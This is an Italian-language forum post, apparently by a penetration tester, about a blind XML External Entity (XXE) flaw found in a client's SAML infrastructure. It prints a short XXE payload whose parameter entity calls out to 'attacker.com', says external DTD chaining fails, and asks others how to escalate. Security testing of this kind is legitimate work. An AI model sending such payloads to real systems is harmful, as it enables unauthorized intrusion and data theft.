Quindi ho trovato un attacco Xml External Entity (XXE) cieco contro un'infrastruttura SAML durante un impegno con il client, ma mi ha dato problemi cercando di sfruttarlo prima. Posso costruire un semplice XXE:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY % xxe SYSTEM "http://attacker.com/">%xxe;
]>
<xml></xml>
e ottengo la connessione http dal loro server, ma qualcosa di più complicato come prelevare un DTD da me e l'esecuzione non ottiene nulla. Riesco a vedere il recupero del DTD ma poi la richiesta DTD (una semplice richiamata al mio server) non viene eseguita. Quindi dopo aver sbattuto la testa contro un muro per tre giorni ho pensato di chiedere alla community se avevano qualche trucco intelligente con XXE o qualsiasi percorso di attacco quando gli attacchi sono limitati.